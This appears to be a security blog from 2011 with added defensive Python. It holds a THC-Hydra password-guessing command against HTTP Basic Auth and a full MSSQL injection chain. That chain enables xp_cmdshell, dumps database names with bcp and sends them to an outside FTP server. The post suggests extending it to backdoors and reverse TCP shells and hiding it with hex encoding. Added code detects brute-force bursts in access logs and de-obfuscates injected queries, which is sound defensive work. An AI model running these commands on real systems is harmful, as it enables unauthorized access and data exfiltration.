Wednesday, March 9, 2011

THC-Hydra HTTP Basic Auth

hydra -L users.lst -P passwords.txt -t12 -f www.site.org http-head / -V
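The run above leaves a characteristic trace on the target: a burst of 401 responses for one path from one source address. As an added example, not from the original post, the following Python picks that burst out of combined-format web server access logs with a sliding window, so that a user who mistypes a password is not flagged. The log lines are constructed; the threshold and window sizes are assumptions to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx combined log format; the request line is "METHOD PATH PROTO".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, path, status) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def detect_basic_auth_bruteforce(lines, threshold=10, window_seconds=60):
    """Flag each source IP that produces `threshold` or more 401 responses
    within any sliding window of `window_seconds`. A guessing tool run with a
    dozen parallel connections produces exactly this burst; a user who
    mistypes a password once or twice does not. Returns {ip: peak 401 count}."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent 401s
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                # skip lines that are not in this format
        ip, ts, _path, status = parsed
        if status != 401:
            continue
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()        # drop 401s that fell out of the window
        if len(window) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(window))
    return flagged


def constructed_log():
    """Constructed sample (not real traffic): 203.0.113.7 sends twelve HEAD
    requests for /admin that all get 401 within 44 seconds, the shape a
    http-head password-guessing run leaves behind; 198.51.100.4 fails twice
    and then authenticates."""
    lines = [
        f'203.0.113.7 - - [09/Mar/2011:10:15:{4 * i:02d} +0000] '
        f'"HEAD /admin HTTP/1.1" 401 -'
        for i in range(12)
    ]
    lines += [
        '198.51.100.4 - - [09/Mar/2011:10:15:10 +0000] "GET /admin HTTP/1.1" 401 -',
        '198.51.100.4 - - [09/Mar/2011:10:15:25 +0000] "GET /admin HTTP/1.1" 401 -',
        '198.51.100.4 - alice [09/Mar/2011:10:15:31 +0000] "GET /admin HTTP/1.1" 200 512',
        'not a log line',
    ]
    return lines


if __name__ == "__main__":
    for ip, hits in detect_basic_auth_bruteforce(constructed_log()).items():
        print(f"{ip}: {hits} failed Basic-auth attempts inside one window")
```

The window is per source address, so a tool spread over many addresses will need a per-path or per-account variant of the same count; the parser returns the path so that is a small change.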

Python tricks

Small notes to myself:

chr() converts an int to the character it codes for. CHAR() is the equivalent syntax in MSSQL, so when analyzing a captured query you can alias it in the Python shell:

>>> CHAR = chr

Now the CHAR() calls can be pasted from the query as they are, for example:

>>> CHAR(65)
'A'

Wednesday, March 2, 2011

SQL Injection to Compromise OS

An MSSQL injection example that communicates with an FTP server. The following POC can be extended to download, upload and execute Metasploit payloads in order to plant backdoors and open reverse TCP connections. I discovered this with a customer who was directly compromised by this very attack vector:

Requirements: MSSQL running with SYSTEM-level (or equivalent) privileges, on a server where the xp_* extended stored procedures have not been removed.

Here is the query in its entirety:

Note: Replace ftp.microsoft.com with your FTP server, and user and password with your username and password.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; exec master..xp_cmdshell 'mkdir temp& (echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt & (bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--

Breakdown:

Step 1: Enable xp_cmdshell, which has been disabled by default since SQL Server 2005:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Step 2: Create temporary directory:
exec master..xp_cmdshell 'mkdir temp&

Step 3: Write the script of FTP commands that ftp -s: will execute in Step 4:
(echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt &

Step 4: Use bcp to dump the list of databases into file.txt, upload it with the FTP script from Step 3, and remove the temporary directory:
(bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--

Recap:
This command creates a temporary directory "temp" and writes into it a script of FTP commands that will upload file.txt. It then runs a SQL query that writes the list of databases into that file. The file is uploaded to the FTP server by ftp -s:temp\ftpcommand.txt, which executes the preset commands. Finally it cleans up with rmdir.

You can obviously extend this to upload or download backdoors and initiate reverse_tcp connections.

Additionally, some trivial obfuscation can mask the query: hex-encode it, store it in a variable, and pass that variable to exec() to bypass primitive application firewalls that key off basic search strings:

declare @q varchar(8000) select @q = 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 exec(@q)
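The hex-wrapped exec(@q) form only defeats a filter that matches the raw request text. As an added example, not from the original post, the Python below normalizes a captured query before matching: it decodes 0x binary literals back to text and collapses CHAR() concatenations, generalizing the CHAR = chr trick from the Python tricks entry above to whole expressions without eval, and then looks for the pieces of the chain described in this post. The sample queries are constructed, and the indicator list is an assumption to extend with what the local WAF or query log shows.

```python
import re

# One piece of a T-SQL string expression: a CHAR(n) call or a quoted literal
# (with '' as the escaped quote). CONCAT matches a run of pieces joined by '+'.
PIECE = r"(?:CHAR\(\s*\d{1,3}\s*\)|'(?:[^']|'')*')"
CONCAT = re.compile(rf"{PIECE}(?:\s*\+\s*{PIECE})*", re.IGNORECASE)
CHAR_CALL = re.compile(r"CHAR\(\s*(\d{1,3})\s*\)", re.IGNORECASE)
# 0x... binary literal, the form "declare @q ... select @q = 0x... exec(@q)" hides behind.
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{2,})")
# Substrings that mark the xp_cmdshell -> bcp -> ftp chain from this post,
# plus the dynamic exec() wrapper used to obfuscate it (assumed list).
INDICATORS = ("sp_configure", "xp_cmdshell", "bcp ", "ftp -s:", "sysdatabases", "exec(")


def _decode_piece(piece):
    """A quoted literal gives its text; CHAR(n) gives chr(n), the CHAR=chr trick."""
    if piece.startswith("'"):
        return piece[1:-1].replace("''", "'")
    return chr(int(CHAR_CALL.fullmatch(piece).group(1)))


def decode_char_concat(sql):
    """Collapse every CHAR()/literal concatenation into one quoted literal, so
    'xp' + CHAR(95) + 'cmdshell' becomes 'xp_cmdshell'. Runs that contain no
    CHAR() call are left untouched so ordinary literals keep their escaping."""
    def repl(m):
        if not CHAR_CALL.search(m.group(0)):
            return m.group(0)
        pieces = re.findall(PIECE, m.group(0), re.IGNORECASE)
        text = "".join(_decode_piece(p) for p in pieces)
        return "'" + text.replace("'", "''") + "'"
    return CONCAT.sub(repl, sql)


def decode_hex_literals(sql):
    """Turn a 0x... literal into the quoted text it encodes, but only when it
    decodes cleanly as printable ASCII; genuine binary values stay as they are."""
    def repl(m):
        raw = m.group(1)
        if len(raw) % 2:
            return m.group(0)
        try:
            text = bytes.fromhex(raw).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
        if not all(c.isprintable() or c in "\r\n\t" for c in text):
            return m.group(0)
        return "'" + text.replace("'", "''") + "'"
    return HEX_LITERAL.sub(repl, sql)


def normalize(sql):
    """Hex first (it may reveal CHAR() calls inside), then CHAR() concatenation."""
    return decode_char_concat(decode_hex_literals(sql))


def find_indicators(sql):
    """Indicators present after de-obfuscation, in INDICATORS order."""
    text = normalize(sql).lower()
    return [ind for ind in INDICATORS if ind in text]


# Constructed samples, not captured traffic. The hex literal spells
# 'xp_cmdshell' in ASCII; the CHAR() form spells "xp_cmdshell 'dir'".
SAMPLES = {
    "plain": "EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;",
    "hex": "declare @q varchar(8000) select @q = 0x78705f636d647368656c6c exec(@q)",
    "char": "exec('xp' + CHAR(95) + 'cmdshell ' + CHAR(39) + 'dir' + CHAR(39))",
}

if __name__ == "__main__":
    for name, query in SAMPLES.items():
        naive = "xp_cmdshell" in query.lower()
        print(f"{name:5s} naive match: {naive!s:5s} decoded: {find_indicators(query)}")
```

A naive substring check finds the indicator only in the plain sample; after normalize() all three report it. On the server side the same chain is also visible without any request inspection: enabling the option writes a "Configuration option 'xp_cmdshell' changed from 0 to 1" entry to the SQL Server error log, which is worth alerting on in its own right.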